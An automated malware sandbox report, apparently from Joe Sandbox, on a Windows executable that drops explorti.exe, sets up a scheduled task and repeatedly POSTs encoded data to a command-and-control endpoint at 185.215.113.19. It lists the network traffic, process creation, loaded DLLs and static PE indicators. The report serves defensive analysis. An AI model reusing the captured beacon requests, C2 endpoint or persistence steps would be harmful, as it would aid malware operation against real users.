                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Source: Joe Sandbox ViewIP Address: 185.215.113.19 185.215.113.19
                  Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 5_2_0069BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,5_2_0069BD60
                  Source: unknownHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: explorti.exe, 00000005.00000002.2903017790.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.php
                  Source: explorti.exe, 00000005.00000002.2903017790.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.php4
                  Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.php6
                  Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.php?
                  Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpC:
                  Source: explorti.exe, 00000005.00000002.2903017790.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpH
                  Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpWindows
                  Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpeb8a7
                  Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpm32
                  Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpoft
                  Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpon
                  Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phprosoft
                  Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpsM

                  System Summary

                  barindex
                  Source: 11NdzR12PS.exeStatic PE information: section name:
                  Source: 11NdzR12PS.exeStatic PE information: section name: .idata
                  Source: 11NdzR12PS.exeStatic PE information: section name:
                  Source: explorti.exe.0.drStatic PE information: section name:
                  Source: explorti.exe.0.drStatic PE information: section name: .idata
                  Source: explorti.exe.0.drStatic PE information: section name:
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 5_2_006D30685_2_006D3068
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 5_2_0069E4405_2_0069E440
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 5_2_00694CF05_2_00694CF0
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 5_2_006C7D835_2_006C7D83
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 5_2_006D765B5_2_006D765B
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 5_2_00694AF05_2_00694AF0
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 5_2_006D777B5_2_006D777B
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 5_2_006D87205_2_006D8720
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 5_2_006D6F095_2_006D6F09
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 5_2_006D2BD05_2_006D2BD0
                  Source: 11NdzR12PS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 11NdzR12PS.exeStatic PE information: Section: ZLIB complexity 0.9997064976092896
                  Source: 11NdzR12PS.exeStatic PE information: Section: wokugkrf ZLIB complexity 0.9944071718563766
                  Source: explorti.exe.0.drStatic PE information: Section: ZLIB complexity 0.9997064976092896
                  Source: explorti.exe.0.drStatic PE information: Section: wokugkrf ZLIB complexity 0.9944071718563766
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/3@0/1
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeFile created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7Jump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 11NdzR12PS.exeVirustotal: Detection: 53%
                  Source: 11NdzR12PS.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeFile read: C:\Users\user\Desktop\11NdzR12PS.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\11NdzR12PS.exe "C:\Users\user\Desktop\11NdzR12PS.exe"
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: mstask.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: chartv.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: atlthunk.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: apphelp.dllJump to behavior
